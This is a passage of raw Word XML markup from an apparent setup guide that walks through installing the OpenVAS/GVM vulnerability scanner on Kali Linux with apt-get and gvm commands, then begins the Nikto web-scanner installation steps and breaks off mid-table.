      </w:r>
    </w:p>
    <w:p w14:paraId="05A561DB" w14:textId="3E807B70" w:rsidR="00E06803" w:rsidRDefault="00E06803" w:rsidP="00E06803">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Installing: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OpenVas</w:t>
      </w:r>
      <w:r w:rsidR="00DD241E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/GVM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (System and Network Vulnerability Scanner)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E43" w14:paraId="0FC7E891" w14:textId="77777777" w:rsidTr="007968D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1E98B8E7" w14:textId="5420A1C9" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:r>
              <w:t>22.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="63FA432B" w14:textId="22D78E11" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>openvas</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B9184F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">(Remember, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>openvas</w:t>
            </w:r>
            <w:r w:rsidRPr="00B9184F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is not installed by default on Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12EFACE1" w14:textId="731FDA72" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:r w:rsidRPr="00690494">
              <w:t>Prior to downloading Nessus, ensure that Kali Linux installation is up to date:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">-get </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00690494">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">-get </w:t>
            </w:r>
            <w:r w:rsidRPr="00E06803">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">dist-upgrade </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-y</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E06803">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E43" w14:paraId="123E6F40" w14:textId="77777777" w:rsidTr="007968D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0331B854" w14:textId="1FDB762A" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:r>
              <w:t>22.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="25792417" w14:textId="77777777" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4C2CE919" w14:textId="77777777" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Install openvas with these next:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00106F95">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00106F95">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="00106F95">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00106F95">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>openvas</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00106F95">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-y</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD241E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD241E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD241E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD241E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>gvm*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="336A5B54" w14:textId="7100D06A" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD241E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D1736B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>gvm-setup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D1736B">
              <w:rPr>
                <w:rStyle w:val="kw2"/>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00D1736B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> gvm-feed-update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E43" w14:paraId="3A63131E" w14:textId="77777777" w:rsidTr="007968D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="003E938A" w14:textId="5647FFF0" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:r>
              <w:t>22.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7BAECBD4" w14:textId="2016DD7B" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BCE74C8" w14:textId="3D4195B4" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:r>
              <w:t>To start up GVM, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007968D1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="007968D1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007968D1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>gvm-start</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="007968D1">
              <w:t>Now the port 9392 will have opened up on your system for GVM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E43" w14:paraId="7AFA548A" w14:textId="77777777" w:rsidTr="007968D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="05E1467C" w14:textId="60FBE953" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:r>
              <w:t>22.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2E59BBB2" w14:textId="283B8756" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43825B6E" w14:textId="28E779CF" w:rsidR="00617E43" w:rsidRDefault="00617E43" w:rsidP="0043739D">
            <w:r>
              <w:t>You can use netstat to check if GVM is opened up:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007968D1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">netstat </w:t>
            </w:r>
            <w:r w:rsidRPr="007968D1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-antp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007968D1" w14:paraId="1F64EF94" w14:textId="77777777" w:rsidTr="007968D1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="45079B3A" w14:textId="77777777" w:rsidR="00E06803" w:rsidRDefault="00E06803" w:rsidP="0043739D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4FDAEBE4" w14:textId="77777777" w:rsidR="00E06803" w:rsidRDefault="00E06803" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C987248" w14:textId="77777777" w:rsidR="00E06803" w:rsidRDefault="00E06803" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27C75E6E" w14:textId="1743C7DB" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="267E7090" w14:textId="06CEC4CF" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="00BC7CB4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Installing: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B9184F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00276437">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>Web Server Vulnerability Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00276437">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1098"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="8023"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC7CB4" w14:paraId="2748AAB7" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5BB10C8B" w14:textId="2EF935F3" w:rsidR="00BC7CB4" w:rsidRDefault="00500E0F" w:rsidP="0043739D">
            <w:r>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00BC7CB4">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="323B0E3C" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nikto</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(nikto should be installed on Kali Linux by default)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(This method should work on other Debian-based OS like Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E9DD031" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:r>
              <w:t>First of all, you can likely find nikto in your Applications right away in Kali Linux OS.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Likewise, if you enter </w:t>
            </w:r>
            <w:r w:rsidRPr="00B9184F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nikto </w:t>
            </w:r>
            <w:r>
              <w:t>in the terminal, you should see it displays in green.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC7CB4" w14:paraId="6127B076" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="29C9E9D3" w14:textId="306574EA" w:rsidR="00BC7CB4" w:rsidRDefault="00500E0F" w:rsidP="0043739D">
            <w:r>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00BC7CB4">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="421C1819" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4AD545C2" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRPr="008B5DEC" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:r w:rsidRPr="008B5DEC">
              <w:t xml:space="preserve">If you need to install </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008B5DEC">
              <w:t>it</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008B5DEC">
              <w:t xml:space="preserve"> however, first refresh your APT package lists</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and upgrade</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:t xml:space="preserve"> using:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72E1F2AC" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRPr="00F551A9" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="008B5DEC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>upgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC7CB4" w14:paraId="43EFD847" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="594" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4AA981FF" w14:textId="0883E4B1" w:rsidR="00BC7CB4" w:rsidRDefault="00500E0F" w:rsidP="0043739D">
            <w:r>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00E06803">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00BC7CB4">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="63ECF963" w14:textId="77777777" w:rsidR="00BC7CB4" w:rsidRDefault="00BC7CB4" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8037" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
